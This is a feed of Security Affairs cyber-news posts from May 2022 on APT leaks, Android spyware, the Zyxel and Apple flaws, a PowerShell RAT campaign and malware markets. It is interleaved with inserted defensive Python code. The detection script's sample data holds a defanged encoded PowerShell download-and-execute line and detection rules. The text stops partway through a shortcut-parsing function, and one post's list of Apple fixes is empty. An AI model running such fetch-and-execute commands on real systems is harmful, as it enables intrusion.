Security Affairs

Read, think, share … Security is everyone's responsibility

Reuters: Russia-linked APT behind Brexit leak website

Sat, 05/28/2022 - 09:30
Russia-linked threat actors are behind a new website that published leaked emails from leading proponents of Britain’s exit from the EU, Reuters reported.

According to a Google cybersecurity official and the former head of UK foreign intelligence, the “Very English Coop d’Etat” website was set up to publish private emails from Brexit supporters, including former British MI6 chief Richard Dearlove, leading Brexit campaigner Gisela Stuart, and historian Robert Tombs.

According to Reuters, at least victims of the leak confirmed the authenticity of the messages and revealed they were targeted by Russia-linked hackers.

Google’s Threat Analysis Group (TAG) chief Shane Huntley told Reuters that the website was set up by a Russia-linked APT dubbed “Cold River”.

At this time it is unclear how the website obtained the sensitive emails; Reuters pointed out that most of the messages appear to have been exchanged using ProtonMail accounts.

“The “English Coop” site makes a variety of allegations, including one that Dearlove was at the center of a conspiracy by Brexit hardliners to oust former British Prime Minister Theresa May, who had negotiated a withdrawal agreement with the European Union in early 2019, and replace her with Johnson, who took a more uncompromising position,” Reuters reported. “Dearlove said that the emails captured a “legitimate lobbying exercise which, seen through this antagonistic optic, is now subject to distortion.””

Security Affairs is one of the finalists for the best European Cybersecurity Blogger Awards 2022 – VOTE FOR YOUR WINNERS. I ask you to vote for me again (even if you have already done it), because this vote is for the final.

Please vote for Security Affairs and Pierluigi Paganini in every category that includes them (e.g. sections “The Underdogs – Best Personal (non-commercial) Security Blog” and “The Tech Whizz – Best Technical Blog”)

To nominate, please visit: 

https://docs.google.com/forms/d/e/1FAIpQLSdNDzjvToMSq36YkIHQWwhma90SR0E9rLndflZ3Cu_gVI2Axw/viewform

Follow me on Twitter: @securityaffairs and Facebook


Pierluigi Paganini

(SecurityAffairs – hacking, Brexit)

The post Reuters: Russia-linked APT behind Brexit leak website appeared first on Security Affairs.

Categories: Cyber Security News

Over 200 Apps on Play Store were distributing Facestealer info-stealer

Tue, 05/17/2022 - 07:43
Experts spotted over 200 Android apps on the Play Store distributing spyware called Facestealer used to steal sensitive data.

Trend Micro researchers spotted over 200 Android apps on the Play Store distributing spyware called Facestealer used to steal sensitive data from infected devices. The malicious apps are able to steal credentials, Facebook cookies, and other personally identifiable information.

Some of the malicious apps discovered by the experts have been installed over a hundred thousand times.

The Facestealer spyware was first spotted in July 2021 by Dr. Web researchers; the development team behind the threat has frequently changed its code.

Most of the malicious apps were VPN apps (42), followed by camera apps (20) and photo editing apps (13).

Trend Micro researchers also discovered 40 fake cryptocurrency miner apps that are variants of similar apps that they discovered in August 2021. The apps deceive users into subscribing to paid services or clicking on ads.

“Facestealer apps are disguised as simple tools — such as virtual private network (VPN), camera, photo editing, and fitness apps — making them attractive lures to people who use these types of apps. Because of how Facebook runs its cookie management policy, we feel that these types of apps will continue to plague Google Play.” concludes the report published by Trend Micro. “As for the fake cryptocurrency miner apps, their operators not only try to profit from their victims by duping them into buying fake cloud-based cryptocurrency-mining services, but they also try to harvest private keys and other sensitive cryptocurrency-related information from users who are interested in what they offer. Looking into the future, we believe that other methods of stealing private keys and mnemonic phrases are likely to appear.”

The report includes Indicators of compromise (IOCs) for these malicious apps.


Pierluigi Paganini

(SecurityAffairs – malware, Facestealer)


CISA adds CVE-2022-30525 flaw in Zyxel Firewalls to its Known Exploited Vulnerabilities Catalog

Tue, 05/17/2022 - 03:11
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the critical CVE-2022-30525 RCE flaw in Zyxel firewalls to its Known Exploited Vulnerabilities Catalog.

The U.S. Cybersecurity and Infrastructure Security Agency added the recently disclosed remote code execution bug, tracked as CVE-2022-30525, affecting Zyxel firewalls, to its Known Exploited Vulnerabilities Catalog.

According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog.

Experts also recommend that private organizations review the Catalog and address the vulnerabilities in their infrastructure.

Last week, Zyxel addressed the critical CVE-2022-30525 flaw (CVSS score: 9.8) affecting Zyxel firewall devices, which enables unauthenticated, remote attackers to gain arbitrary code execution as the “nobody” user.

The vulnerability was discovered by Rapid7, which reported it to the vendor on April 13. Zyxel silently addressed the flaw by releasing security updates on April 28, 2022; Rapid7 pointed out that this choice leaves defenders in the dark and only advantages attackers.

“The affected models are vulnerable to unauthenticated and remote command injection via the administrative HTTP interface. Commands are executed as the nobody user.” reads the report published by Rapid7.

Below is the list of vulnerable products and related patches:

  • USG FLEX 100(W), 200, 500, 700: affected firmware ZLD V5.00 through ZLD V5.21 Patch 1; patch available in ZLD V5.30
  • USG FLEX 50(W) / USG20(W)-VPN: affected firmware ZLD V5.10 through ZLD V5.21 Patch 1; patch available in ZLD V5.30
  • ATP series: affected firmware ZLD V5.10 through ZLD V5.21 Patch 1; patch available in ZLD V5.30
  • VPN series: affected firmware ZLD V4.60 through ZLD V5.21 Patch 1; patch available in ZLD V5.30
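Checking a device inventory against these ranges means parsing strings such as “ZLD V5.21 Patch 1” into something comparable and deciding, per model family, whether a build is affected, already on V5.30, or simply not covered by the table. The Python helper below is an added example, not Zyxel’s or Rapid7’s code: the model-to-row matchers and the sample inventory are assumptions derived from the table above, and any firmware that falls outside the listed affected range but below the V5.30 fix is reported as not listed rather than guessed either way.

```python
import re

# Accepts "ZLD V5.21 Patch 1", "V5.30", "ZLD V5.00" and similar spellings.
ZLD_RE = re.compile(r"(?:ZLD\s*)?V?(\d+)\.(\d+)(?:\s*Patch\s*(\d+))?", re.I)


def parse_zld(version: str):
    """'ZLD V5.21 Patch 1' -> (5, 21, 1); 'V5.30' -> (5, 30, 0)."""
    m = ZLD_RE.search(version)
    if not m:
        raise ValueError(f"unrecognised ZLD version: {version!r}")
    major, minor, patch = m.groups()
    return (int(major), int(minor), int(patch or 0))


def _norm(model: str) -> str:
    # Strip spaces and upper-case so "USG FLEX 100W" and "usgflex100w" compare equal.
    return re.sub(r"\s+", "", model).upper()


# Rows of the Rapid7 table: (row label, model matcher, first affected, last affected, fixed).
# The matchers are an assumption about how individual model names map to each row.
AFFECTED_ROWS = [
    ("USG FLEX 100(W), 200, 500, 700",
     lambda m: m.startswith("USGFLEX") and m[7:].rstrip("W") in {"100", "200", "500", "700"},
     "V5.00", "V5.21 Patch 1", "V5.30"),
    ("USG FLEX 50(W) / USG20(W)-VPN",
     lambda m: m in {"USGFLEX50", "USGFLEX50W", "USG20-VPN", "USG20W-VPN"},
     "V5.10", "V5.21 Patch 1", "V5.30"),
    ("ATP series", lambda m: m.startswith("ATP"), "V5.10", "V5.21 Patch 1", "V5.30"),
    ("VPN series", lambda m: m.startswith("VPN"), "V4.60", "V5.21 Patch 1", "V5.30"),
]


def assess(model: str, version: str) -> str:
    """One of: affected, patched, not_listed (outside the table's range), unknown_model."""
    m = _norm(model)
    v = parse_zld(version)
    for _, match, first, last, fixed in AFFECTED_ROWS:
        if not match(m):
            continue
        if v >= parse_zld(fixed):
            return "patched"
        if parse_zld(first) <= v <= parse_zld(last):
            return "affected"
        # e.g. a hypothetical V5.21 Patch 2 or a pre-V4.60 build: verify with the vendor.
        return "not_listed"
    return "unknown_model"


# Constructed sample inventory (assumption, not real devices).
SAMPLE_INVENTORY = [
    ("USG FLEX 100W", "ZLD V5.10"),
    ("USG20W-VPN", "ZLD V5.21 Patch 1"),
    ("ATP500", "ZLD V5.30"),
    ("VPN300", "ZLD V4.50"),
    ("NSG100", "ZLD V5.10"),
]


def triage(inventory):
    """Group models by status so affected devices can be prioritised for patching."""
    out = {}
    for model, version in inventory:
        out.setdefault(assess(model, version), []).append(model)
    return out


if __name__ == "__main__":
    for status, models in triage(SAMPLE_INVENTORY).items():
        print(f"{status:14} {', '.join(models)}")
```

The version tuple compares major, minor and patch number in that order, so “V5.21 Patch 1” sorts above “V5.21” and below “V5.30”; the “not_listed” status exists precisely so that a build the table does not mention is surfaced for manual verification instead of being silently marked safe.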

According to Rapid7, the Shodan search engine tracks more than 15,000 internet-facing vulnerable systems. The researchers also developed a Metasploit module for this issue and published a video PoC of the attack.

“Apply the vendor patch as soon as possible. If possible, enable automatic firmware updates. Disable WAN access to the administrative web interface of the system.” concludes the report.

Researchers at the Shadowserver Foundation reported that they started observing exploitation attempts for CVE-2022-30525 on May 13th. The experts claim that at least 20,800 of the potentially affected Zyxel firewall models (by unique IP) are exposed online; the majority of the affected models are in the EU – France (4.5K) and Italy (4.4K) – and the US (2.4K).

We see at least 20 800 of the potentially affected Zyxel firewall models (by unique IP) accessible on the Internet. Most popular are USG20-VPN (10K IPs) and USG20W-VPN (5.7K IPs).

Most of the CVE-2022-30525 affected models are in the EU – France (4.5K) and Italy (4.4K).

— Shadowserver (@Shadowserver) May 15, 2022

CISA also added the CVE-2022-22947 code injection vulnerability in Spring Cloud Gateway to the catalog. A remote attacker could send specially crafted requests to vulnerable systems to gain arbitrary code execution. Last week, Microsoft experts reported that the Sysrv-K botnet is exploiting this issue to take over vulnerable web servers.

Both issues have to be addressed by federal agencies by June 6.


Pierluigi Paganini

(SecurityAffairs – hacking, domain name system)


A custom PowerShell RAT used to target German users using the Ukraine crisis as bait

Tue, 05/17/2022 - 01:19
Researchers spotted a threat actor using a custom PowerShell RAT targeting German users to gain intelligence on the Ukraine crisis.

Malwarebytes experts uncovered a campaign that targets German users with a custom PowerShell RAT. The threat actors attempt to trick victims into opening weaponized documents by using the current situation in Ukraine as bait.

The attackers registered an expired German domain name, collaboration-bw[.]de, and used it as a decoy site. The site hosted a bait document named “2022-Q2-Bedrohungslage-Ukraine,” used to deliver the custom malware; the document appears to contain information about the current crisis in Ukraine.

The download page contains a blue download button and the text on the page claims that the document provides important information about the current threat posed by the Ukraine crisis. According to the site, the document is constantly updated.

Upon clicking on the button, a ZIP archive is downloaded to the victim’s computer. The archive contains a CHM file consisting of several compiled HTML files. If the victim opens the HTML files, an error message is displayed while PowerShell runs a Base64-encoded command.

“After de-obfuscating the command we can see it is designed to execute a script downloaded from the fake Baden-Württemberg website, using Invoke-Expression (IEX).” reads the analysis published by Malwarebytes.

“The downloaded script creates a folder called SecuriyHealthService in the current user directory and drops two files into it: MonitorHealth.cmd and a script called Status.txt. The .cmd file is very simple and just executes Status.txt through PowerShell.”

MonitorHealth.cmd achieves persistence by creating a scheduled task that executes it every day at a specific time.

The PowerShell RAT collects basic system information and exfiltrates it to the domain “kleinm[.]de”.

The script bypasses the Windows Antimalware Scan Interface (AMSI) using an AES-encrypted function called bypass. It is decrypted using a generated key and IV before execution.

The malicious code builds a unique id for the victim and exfiltrates data as a JSON data structure sent to the C2 server via a POST request.

The RAT supports the following capabilities:

  • Download (type: D0WNl04D): Download files from server
  • Upload (type: UPL04D): Upload file to the server
  • LoadPS1 (type: L04DPS1): Load and execute a PowerShell script
  • Command (type: C0MM4ND): Execute a specific command

“It is not easy to attribute this activity to a specific actor, and there are no solid indicators to support attribution. Based on motivation alone, we hypothesise that a Russian threat actor could be targeting German users, but without clear connections in infrastructure or similarities to known TTPs, such attribution is weak.” concludes the report that includes indicators of compromise (IoCs).
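The chain described above offers a defender several independent detection points: the CHM viewer spawning PowerShell with an encoded command that decodes to an IEX call, a scheduled task whose action lives in a look-alike “SecuriyHealthService” folder under the user profile (one letter away from the legitimate Windows SecurityHealthService), and JSON POSTed to the exfiltration domain. The Python script below is an added example, not code from Malwarebytes or from the original post: it runs those rules over constructed sample telemetry. The event dicts, host names and the defanged encoded command are assumptions made up for the example, not real log data; the only page-derived values are the folder and file names and the kleinm[.]de domain.

```python
import base64
import re


def encode_ps_command(cmd: str) -> str:
    """PowerShell's -EncodedCommand takes base64 over UTF-16LE text."""
    return base64.b64encode(cmd.encode("utf-16le")).decode("ascii")


# Defanged stand-in for the encoded downloader the report describes (assumption).
SAMPLE_ENCODED = encode_ps_command(
    "IEX (New-Object Net.WebClient).DownloadString('hxxps://collaboration-bw[.]de/REDACTED')"
)

# Constructed sample telemetry (NOT real logs): simplified process-creation,
# scheduled-task and HTTP records, one dict per event.
SAMPLE_EVENTS = [
    {"type": "process", "host": "ws01", "parent": r"C:\Windows\hh.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -w hidden -EncodedCommand {SAMPLE_ENCODED}"},
    {"type": "task_created", "host": "ws01", "task": "MonitorHealth",
     "action": r"C:\Users\alice\SecuriyHealthService\MonitorHealth.cmd",
     "schedule": "DAILY"},
    {"type": "http", "host": "ws01", "method": "POST", "dest": "kleinm.de",
     "content_type": "application/json"},
    # Benign activity on a second host, to show the rules stay quiet on it.
    {"type": "process", "host": "ws02", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1"},
    {"type": "task_created", "host": "ws02", "task": "Backup",
     "action": r"C:\Program Files\Backup\run.cmd", "schedule": "DAILY"},
    {"type": "http", "host": "ws02", "method": "GET", "dest": "update.example.test",
     "content_type": "text/html"},
]

C2_WATCHLIST = {"kleinm.de"}  # exfiltration domain named in the Malwarebytes report
LEGIT_SERVICE_DIRS = {"securityhealthservice"}  # real Windows component the folder imitates
ENCODED_FLAG = re.compile(r"-(?:enc|encodedcommand|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline: str):
    """Return the plaintext of a -EncodedCommand argument, or None if there is none."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to catch look-alike folder names."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of_service(path: str):
    """Folder under C:\\Users whose name is 1-2 edits from a legitimate service name."""
    parts = path.replace("/", "\\").split("\\")
    if len(parts) < 4 or parts[1].lower() != "users":
        return None
    for folder in parts[3:-1]:
        for legit in LEGIT_SERVICE_DIRS:
            if 0 < edit_distance(folder.lower(), legit) <= 2:
                return folder
    return None


def detect(events):
    """Return (host, rule, detail) tuples for every rule that fires."""
    findings = []
    for ev in events:
        host = ev["host"]
        if ev["type"] == "process" and ev["image"].lower().endswith("powershell.exe"):
            if ev["parent"].lower().endswith("\\hh.exe"):  # CHM viewer as parent
                findings.append((host, "chm_spawned_powershell", ev["parent"]))
            decoded = decode_encoded_command(ev["cmdline"])
            if decoded and re.search(r"\b(iex|invoke-expression)\b", decoded, re.I):
                findings.append((host, "encoded_iex", decoded[:40]))
        elif ev["type"] == "task_created":
            bad = lookalike_of_service(ev["action"])
            if bad:
                findings.append((host, "task_in_lookalike_user_folder", bad))
        elif ev["type"] == "http":
            if (ev["method"] == "POST" and ev["dest"] in C2_WATCHLIST
                    and ev["content_type"] == "application/json"):
                findings.append((host, "json_post_to_watchlisted_domain", ev["dest"]))
    return findings


if __name__ == "__main__":
    for host, rule, detail in detect(SAMPLE_EVENTS):
        print(f"{host}: {rule} ({detail})")
```

Each rule is weak on its own (encoded commands and daily tasks are common in administration), which is why the script reports them per host: three or four of them on the same machine within a short window is the signal worth paging on. The look-alike check uses edit distance against the real service name rather than a fixed string, so a future variant that drops a different letter is still caught, while an exact match to the legitimate name is deliberately not flagged.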


Pierluigi Paganini

(SecurityAffairs – hacking, domain name system)


Apple fixes the sixth zero-day since the beginning of 2022

Mon, 05/16/2022 - 16:27
Apple released security updates to address a zero-day bug actively exploited in attacks against Macs and Apple Watch devices.

Apple has addressed a zero-day vulnerability, tracked as CVE-2022-22675, actively exploited in attacks aimed at Macs and Apple Watch devices.

The flaw is an out-of-bounds write issue in AppleAVD that can lead to arbitrary code execution with kernel privileges.

“An application may be able to execute arbitrary code with kernel privileges.” reads the advisory published by Apple. “An out-of-bounds write issue was addressed with improved bounds checking. Apple is aware of a report that this issue may have been actively exploited.”

The flaw affects macOS Big Sur and Apple Watch Series 3 or later; Apple fixed the issue with the release of macOS Big Sur 11.6.6 and watchOS 8.6. Users should install the updates as soon as possible.

This is the sixth zero-day addressed by Apple since January, below is the list of fixed issues:


Pierluigi Paganini

(SecurityAffairs – hacking, Apple)


Experts show how to run malware on chips of a turned-off iPhone

Mon, 05/16/2022 - 10:48
Researchers devised an attack technique to tamper with the firmware and run malware on a Bluetooth chip while an iPhone is “off.”

A team of researchers from the Secure Mobile Networking Lab (SEEMOO) at the Technical University of Darmstadt demonstrated a technique to tamper with the firmware and load malware onto a chip while an iPhone is “OFF.”

Experts pointed out that when an iPhone is turned off, most wireless chips (Bluetooth, Near Field Communication (NFC), and Ultra-wideband (UWB)) continue to operate.

“The Bluetooth and UWB chips are hardwired to the Secure Element (SE) in the NFC chip, storing secrets that should be available in LPM,” the researchers said.

Low-Power Mode (LPM) was introduced with iOS 15 and is supported on iPhone 11, iPhone 12, and iPhone 13 devices.

Many users are unaware of these features, even if they know that their iPhone remains locatable after the device is turned off.

The experts mentioned the case of a user-initiated shutdown during which the iPhone remains locatable via the Find My network.

The researchers focused their analysis on how Apple implements standalone wireless features while iOS is not running, and discovered that the wireless chips have direct access to the secure element.

“LPM [Low Power Mode] support is implemented in hardware. The Power Management Unit (PMU) can turn on chips individually. The Bluetooth and UWB chips are hardwired to the Secure Element (SE) in the NFC chip, storing secrets that should be available in LPM. Since LPM support is implemented in hardware, it cannot be removed by changing software components.” reads the paper published by the researchers. “As a result, on modern iPhones, wireless chips can no longer be trusted to be turned off after shutdown. This poses a new threat model. Previous work only considered that journalists are not safe against espionage when enabling airplane mode in case their smartphones were compromised”

The experts explained that a threat actor has different options to tamper with the firmware, depending on their preconditions. Unlike the NFC and UWB chips, the Bluetooth firmware is neither signed nor encrypted, which opens the door to modification.

An attacker with privileged access could exploit this to run malware on an iPhone’s Bluetooth chip even when the device is off.

“The current LPM implementation on Apple iPhones is opaque and adds new threats. Since LPM support is based on the iPhone’s hardware, it cannot be removed with system updates. Thus, it has a long-lasting effect on the overall iOS security model.” concludes the paper. “To the best of our knowledge, we are the first who looked into undocumented LPM features introduced in iOS 15 and uncover various issues. Design of LPM features seems to be mostly driven by functionality, without considering threats outside of the intended applications. Find My after power off turns shutdown iPhones into tracking devices by design, and the implementation within the Bluetooth firmware is not secured against manipulation. Tracking properties could stealthily be changed by attackers with system-level access.”

The researchers will present the results of their study at the ACM Conference on Security and Privacy in Wireless and Mobile Networks (WiSec 2022).


Pierluigi Paganini

(SecurityAffairs – hacking, domain name system)


Ukrainian national sentenced to 4 years in prison for selling access to hacked servers

Mon, 05/16/2022 - 06:36
A 28-year-old Ukrainian national has been sentenced to four years in prison for selling access to hacked servers.

Glib Oleksandr Ivanov-Tolpintsev, a 28-year-old Ukrainian national, has been sentenced to four years in prison for selling access to compromised servers on the dark web. The man was arrested in Poland in October 2020, was extradited to the U.S. in September 2021, and pleaded guilty to the charges in February. Ivanov-Tolpintsev was charged with conspiracy, trafficking in unauthorized access devices, and trafficking in computer passwords.

The man controlled a botnet that conducted brute-force attacks to guess computer login credentials. He was able to gather login credentials for at least 2,000 computers every week; these were then offered for sale on the dark web to facilitate a wide range of illegal activity.

The man was offering over 700,000 compromised servers for sale on an unnamed marketplace.

“According to court documents, the “Marketplace” was a dark web website that illegally sold login credentials (usernames and passwords) to servers located across the world and personally identifiable information (dates of birth and Social Security numbers) of U.S. residents. Once purchased, criminals used these servers to facilitate a wide range of illegal activity that included ransomware attacks and tax fraud. In total, the Marketplace offered more than 700,000 compromised servers for sale including at least 150,000 in the United States and at least 8,000 in Florida.” reads the press release published by the DoJ. “Marketplace victims spanned the globe and industries, including local, state, and federal government infrastructure, hospitals, 911 and emergency services, call centers, major metropolitan transit authorities, accounting and law firms, pension funds, and universities.”


Pierluigi Paganini

(SecurityAffairs – hacking, Ukrainian national)


Eternity Project: You can pay $260 for a stealer and $490 for a ransomware

Mon, 05/16/2022 - 01:28
Researchers from threat intelligence firm Cyble analyzed the Eternity Project Tor website which offers any kind of malicious code.

Researchers at cybersecurity firm Cyble analyzed a Tor website named ‘Eternity Project’ that offers for sale a broad range of malware, including stealers, miners, ransomware, and DDoS bots.

The experts discovered the marketplace during a routine investigation and found that its operators also run a Telegram channel with around 500 subscribers, used to share information about malware listings and updates.

The operators behind the project allow their customers to customize the binary features through the Telegram channel.  

Eternity Stealer

The operators sell the Stealer module for $260 as an annual subscription; it allows buyers to steal a wide range of sensitive information from infected systems, including passwords, cookies, credit card data, and crypto-wallets. Stolen data is exfiltrated via a Telegram bot.

The Eternity Miner module goes for $90 as an annual subscription; customers can customize it with their own Monero pool and anti-VM features. The Eternity operators also sell a clipper malware for $110, which monitors the clipboard for cryptocurrency wallet addresses and replaces them with the attackers’ wallet address.

The Eternity Ransomware goes for $490 while the Eternity Worm is available for $390.

According to Cyble, the operators behind the Eternity Project are also developing a DDoS bot, borrowing code from an existing GitHub repository. The experts speculate that the Jester Stealer could also be a rebrand of this GitHub project, which would indicate links between the two threat actors.

“Cyble Research Labs has observed a significant increase in cybercrime through Telegram channels and cybercrime forums where TAs sell their products without any regulation. We have encountered the Eternity products being sold on one such Telegram channel and TOR website.” concludes Cyble, which also shared Indicators of Compromise (IoCs) for this threat.


Pierluigi Paganini

(SecurityAffairs – hacking, malware)


May 08 – May 14 Ukraine – Russia the silent cyber conflict

Sun, 05/15/2022 - 12:47
This post provides a timeline of the events related to the Russian invasion of Ukraine from the cyber security perspective.

Below is the timeline of the events related to the ongoing Russian invasion that occurred in the previous week:

May 14 – The LEGION collective calls to action to attack the final of the Eurovision song contest

The Pro-Russian volunteer movement known as LEGION is calling to launch DDoS attacks against the final of the Eurovision song contest.

May 14 – OpRussia update: Anonymous breached other organizations

Another week has passed and Anonymous has hacked other Russian companies and leaked their data via DDoSecrets.

May 14 – Pro-Russian hacktivists target Italy government websites

Pro-Russian hacker group Killnet targeted the websites of several Italian institutions, including the senate and the National Institute of Health.

May 11 – EU condemns Russian cyber operations against Ukraine

The European Union condemns the cyberattacks conducted by Russian entities against Ukraine, which targeted the satellite KA-SAT network.

May 10 – Hacktivists hacked Russian TV schedules during Victory Day and displayed anti-war messages

Hacktivists yesterday defaced the Russian TV with pro-Ukraine messages and took down the RuTube video streaming site.

May 9 – CERT-UA warns of malspam attacks distributing the Jester info stealer

The Computer Emergency Response Team of Ukraine (CERT-UA) warns of attacks spreading info-stealing malware Jester Stealer.

The U.S. government offers up to $10 million for info that allows to identify or locate six Russian GRU hackers who are members of the Sandworm APT group.

Previous timelines:

  • Feb 7 – Feb 27 Ukraine – Russia the silent cyber conflict
  • Feb 27 – Mar 05 Ukraine – Russia the silent cyber conflict
  • Mar 06 – Mar 12 Ukraine – Russia the silent cyber conflict
  • Mar 13 – Mar 19 Ukraine – Russia the silent cyber conflict
  • Mar 20 – Mar 26 Ukraine – Russia the silent cyber conflict
  • Mar 27 – Apr 02 Ukraine – Russia the silent cyber conflict
  • Apr 03 – Apr 09 Ukraine – Russia the silent cyber conflict
  • Apr 10 – Apr 16 Ukraine – Russia the silent cyber conflict
  • Apr 17 – Apr 23 Ukraine – Russia the silent cyber conflict
  • Apr 24 – Apr 30 Ukraine – Russia the silent cyber conflict
  • May 01 – May 07 Ukraine – Russia the silent cyber conflict


Pierluigi Paganini

(SecurityAffairs – hacking, Ukraine)


Security Affairs newsletter Round 365 by Pierluigi Paganini

Sun, 05/15/2022 - 10:34
A new round of the weekly Security Affairs newsletter arrived! Every week the best security articles from Security Affairs for free in your email box.

If you want to also receive for free the newsletter with the international press subscribe here.

  • The LEGION collective calls to action to attack the final of the Eurovision song contest
  • OpRussia update: Anonymous breached other organizations
  • Pro-Russian hacktivists target Italy government websites
  • SonicWall urges customers to fix SMA 1000 vulnerabilities
  • Zyxel fixed firewall unauthenticated remote command injection issue
  • Iran-linked COBALT MIRAGE group uses ransomware in its operations
  • New Nerbian RAT spreads via malspam campaigns using COVID-19
  • Massive hacking campaign compromised thousands of WordPress websites
  • Red TIM Research (RTR) founds 2 bugs affecting F5 Traffix SDC
  • Five Eyes agencies warn of attacks on MSPs
  • CISA adds CVE-2022-1388 flaw in F5 BIG-IP to its Known Exploited Vulnerabilities Catalog
  • Microsoft Patch Tuesday updates for May 2022 fixes 3 zero-days, 1 under active attack
  • EU condemns Russian cyber operations against Ukraine
  • Microsoft fixed RCE flaw in a driver used by Azure Synapse and Data Factory
  • Hacktivists hacked Russian TV schedules during Victory Day and displayed anti-war messages
  • Threat actors are actively exploiting CVE-2022-1388 RCE in F5 BIG-IP
  • Exclusive: Welcome “Frappo” – Resecurity identified a new Phishing-as-a-Service
  • DCRat, only $5 for a fully working remote access trojan
  • CERT-UA warns of malspam attacks distributing the Jester info stealer
  • Experts developed exploits for CVE-2022-1388 RCE in F5 BIG-IP products
  • Experts uncovered a new wave of attacks conducted by Mustang Panda
  • Conti ransomware claims to have hacked Peru MOF – Dirección General de Inteligencia (DIGIMIN)
  • May 01 – May 07 Ukraine – Russia the silent cyber conflict
  • NIST published updated guidance for supply chain risks
  • US agricultural machinery manufacturer AGCO suffered a ransomware attack
  • Security Affairs newsletter Round 364 by Pierluigi Paganini
  • US DoS offers a reward of up to $15M for info on Conti ransomware gang


Pierluigi Paganini

(SecurityAffairs – hacking, newsletter)

The post Security Affairs newsletter Round 365 by Pierluigi Paganini appeared first on Security Affairs.

Categories: Cyber Security News

Ukraine CERT-UA warns of new attacks launched by Russia-linked Armageddon APT

Sun, 05/15/2022 - 08:48
Ukraine Computer Emergency Response Team (CERT-UA) reported a phishing campaign conducted by Armageddon APT using GammaLoad.PS1_v2 malware.

Ukraine Computer Emergency Response Team (CERT-UA) reported a phishing campaign using messages with subject “On revenge in Kherson!” and containing the “Plan Kherson.htm” attachment.

The HTM file decodes and drops an archive named “Herson.rar”, which contains a shortcut file named “Plan of approach and planting explosives on the objects of critical infrastructure of Kherson.lnk”.

Upon clicking on the shortcut file, the HTA file “precarious.xml” is loaded and executed, leading to the creation and execution of the files “desktop.txt” and “user.txt”.

In the last stage of the attack chain, the GammaLoad.PS1_v2 malware is downloaded and executed on the victim’s computer.
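The chain above hinges on a shortcut whose target is a script host and whose payload does not carry the extension that host expects. The following is an added example, not CERT-UA's code or the campaign's: a minimal parser for the StringData of a Shell Link (.lnk) file and a triage rule that flags shortcuts of this shape. The sample shortcut is built in the block to mirror the lure; that it invokes mshta.exe and the staging host example.invalid are assumptions, since the advisory only says the HTA file is loaded when the shortcut is clicked.

```python
import re
import struct

# LinkFlags bits (MS-SHLLINK 2.1.1) that say which optional structures
# follow the fixed 76-byte ShellLinkHeader.
HAS_LINK_TARGET_ID_LIST = 1 << 0
HAS_LINK_INFO = 1 << 1
HAS_NAME = 1 << 2
HAS_RELATIVE_PATH = 1 << 3
HAS_WORKING_DIR = 1 << 4
HAS_ARGUMENTS = 1 << 5
HAS_ICON_LOCATION = 1 << 6
IS_UNICODE = 1 << 7
HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# Script hosts that turn a double-click into code execution, and what each normally loads.
SCRIPT_HOSTS = ("mshta", "powershell", "pwsh", "wscript", "cscript", "cmd", "rundll32", "regsvr32")
EXPECTED_EXT = {"mshta": (".hta",), "powershell": (".ps1",), "pwsh": (".ps1",),
                "wscript": (".js", ".vbs", ".wsf"), "cscript": (".js", ".vbs", ".wsf")}


def build_lnk(relative_path, arguments, working_dir=""):
    """Minimal Unicode .lnk (header, StringData, TerminalBlock) used only to construct
    offline samples; real shortcuts usually also carry an IDList and LinkInfo."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE | (HAS_WORKING_DIR if working_dir else 0)
    header = struct.pack("<I", HEADER_SIZE) + LNK_CLSID + struct.pack("<I", flags)
    header += b"\x00" * (HEADER_SIZE - len(header))  # attributes, timestamps, icon, hotkey, reserved

    def string_data(s):  # CountCharacters (u16) then UTF-16LE chars, no terminator
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    body = string_data(relative_path) + (string_data(working_dir) if working_dir else b"") + string_data(arguments)
    return header + body + struct.pack("<I", 0)  # TerminalBlock closes ExtraData


def parse_lnk(data):
    """Return the StringData fields of a .lnk as a dict ('' where a field is absent)."""
    if len(data) < HEADER_SIZE or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:  # IDListSize (u16) does not count itself
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:  # LinkInfoSize (u32) counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    # StringData items appear in this fixed order, each only if its flag is set.
    for flag, key in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location")):
        if not flags & flag:
            fields[key] = ""
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + width * count]
        fields[key] = raw.decode("utf-16-le") if width == 2 else raw.decode("cp1252", "replace")
        pos += width * count
    return fields


def triage_lnk(filename, fields):
    """List the reasons a shortcut looks like a lure; an empty list means nothing stood out."""
    reasons = []
    target = fields["relative_path"].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    host = target[:-4] if target.endswith(".exe") else target
    if host not in SCRIPT_HOSTS:
        return reasons
    reasons.append(f"target is script host {host}")
    for token in fields["arguments"].split():
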